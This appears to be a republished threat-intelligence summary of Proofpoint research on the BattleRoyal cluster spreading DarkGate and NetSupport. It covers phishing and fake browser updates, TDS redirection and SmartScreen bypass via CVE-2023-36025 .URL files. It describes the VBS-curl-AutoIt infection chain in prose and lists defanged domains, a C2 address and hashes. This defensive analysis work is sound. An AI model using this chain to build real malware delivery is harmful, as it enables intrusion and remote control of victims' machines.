Threat Research

BattleRoyal, DarkGate Cluster Spreads via Email and Fake Browser Updates  | Proofpoint US

Proofpoint

Proofpoint tracked a BattleRoyal activity cluster that delivered DarkGate (and later NetSupport) via large-scale email campaigns and browser-based fake updates, using traffic delivery systems (404 TDS, Keitaro TDS) and specially crafted .URL files to bypass SmartScreen (CVE-2023-36025). Campaigns used multi-stage chains (TDS → .URL → VBS → shell commands → AutoIt → DarkGate/NetSupport) targeting users primarily in the US and Canada. #DarkGate #BattleRoyal #CVE-2023-36025 #NetSupport

Keypoints

  • Operators (called BattleRoyal) ran at least 20 email campaigns from Sep–Nov 2023 using GroupIDs like “PLEX” and “ADS5”.
  • Delivery methods combined mass email, malvertising/fake browser updates (RogueRaticate), and compromised sites via 404 and Keitaro TDS.
  • Every campaign used .URL internet shortcut files that exploited CVE-2023-36025 to bypass SmartScreen protections.
  • Typical attack chain: Email link → 404 TDS → Keitaro TDS → .URL → zipped VBS → VBS executes shell commands → curl to download AutoIt interpreter + script → AutoIt runs embedded DarkGate.
  • Observed payloads included DarkGate (AutoIt-embedded) and later a switch to NetSupport RAT; both enable remote access and follow-on activity.
  • Proofpoint published multiple IDS/ETP signatures for WebDAV/.URL retrievals and DarkGate/NetSupport behaviors; notable C2 and hosting indicators were enumerated.

MITRE Techniques

  • [T1566.002] Spearphishing Link – Emails contained redirecting TDS URLs that users clicked to start the chain (‘The emails in this campaign contained: 404 TDS URLs that, if clicked by the user, redirected to Keitaro TDS’).
  • [T1189] Drive-by Compromise – Browser-based fake update (RogueRaticate) delivered payloads via injected requests and steganography on web pages (‘This campaign delivered fake browser update requests to end users on their web browsers that dropped a DarkGate payload’).
  • [T1027.005] Obfuscated Files or Information: Steganography – Malicious code hidden in .css steganography to conceal payload retrieval (‘the threat actor injected a request to a domain they controlled that used .css steganography to conceal the malicious code’).
  • [T1203] Exploitation for Client Execution – CVE-2023-36025 in Windows SmartScreen was exploited by specially crafted .URL files to avoid SmartScreen alerts (‘a SmartScreen alert would not be triggered when a .URL points to a SMB or WebDav share…’).
  • [T1059] Command and Scripting Interpreter – VBS scripts and AutoIt scripts executed shell commands to stage the payload (‘The VBS in turn downloaded and executed several shell commands (cmd.exe)… ran an embedded DarkGate’).
  • [T1105] Ingress Tool Transfer – Use of curl.exe and direct HTTP/SMB/WebDAV retrievals to download AutoIt interpreter, scripts, and executables (‘used the curl to download Autoit3.exe… used curl to download and save an AutoIT script’).
  • [T1071.001] Application Layer Protocol: Web Protocols – DarkGate C2 communicated over HTTPS (port 443) for command-and-control (‘DarkGate C2 (DarkGate campaign) 161.35.113[.]58:443’).
  • [T1219] Remote Access Software – Use of NetSupport remote admin tool to enable remote control and lateral movement (‘Proofpoint analysts observed the activity cluster replace DarkGate with NetSupport, a legitimate remote access tool’).

Indicators of Compromise

  • [Domains/URLs] TDS and payload hosts – hxxps[:]//heilee[.]com/qxz3l (404 TDS), hxxps[:]//nathumvida[.]org/ (Keitaro TDS), and other TDS/payload domains like zxcdota2huysasi[.]com.
  • [IP Addresses/C2] Command and payload hosts – 161.35.113[.]58:443 (DarkGate C2), 5.181.159[.]29 (hosting .URL targets/downloader).
  • [File hashes (SHA256)] Samples used in chains – 96ca146b6bb95de35f61289c2725f979a2957ce54761aff5f37726a85f2f9e77 (IN-SEPT-8415-8794132.pdf.url), e2a8a53e117f1dda2c09e5b83a13c99b848873a75b14d20823318840e84de243 (bye.vbs), and other hashes listed.
  • [File names] Staged artifacts – bye.vbs (zipped VBS downloader), Autoit3.exe (AutoIt interpreter), evervendor.exe (NetSupport payload), and .URL files like pr-nv28-2023.url.

The technical procedure used by the BattleRoyal cluster relies on multi-stage web redirectors and internet shortcut (.URL) abuse to get around SmartScreen. Initial lures (mass phishing links or injected fake browser-update prompts) pointed victims to 404/Keitaro TDS domains which served .URL files; when the .URL was activated it referenced file:// or WebDAV/SMB locations inside ZIP containers (CVE-2023-36025), allowing the actor to avoid SmartScreen warnings and trigger a download of a zipped VBS payload.

Once executed, the VBS invoked cmd.exe to create a staging directory, copy or call curl from the system, and use curl to fetch an AutoIt interpreter (Autoit3.exe) and one or more AutoIt scripts. The AutoIt script unpacked/decoded an embedded DarkGate loader (or later a NetSupport executable), completing ingress tool transfer and establishing C2 over HTTPS (e.g., 161.35.113[.]58:443). The chain frequently included multiple .URL hops (one .URL downloading another) and TDS-based traffic filtering to evade unwanted visitors.

Operationally, the actor used CSS steganography on malicious web pages to hide code that contacted Keitaro filters (RogueRaticate) and employed AutoIt-based loaders to make detection and analysis harder. Defenders should prioritize detection for .URL retrievals from WebDAV/SMB targets, VBS/AutoIt execution patterns that spawn curl/cmd, and outbound connections to known C2 hosts and TDS domains listed in the IOCs above.

Read more: https://www.proofpoint.com/us/blog/threat-insight/battleroyal-darkgate-cluster-spreads-email-and-fake-browser-updates

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint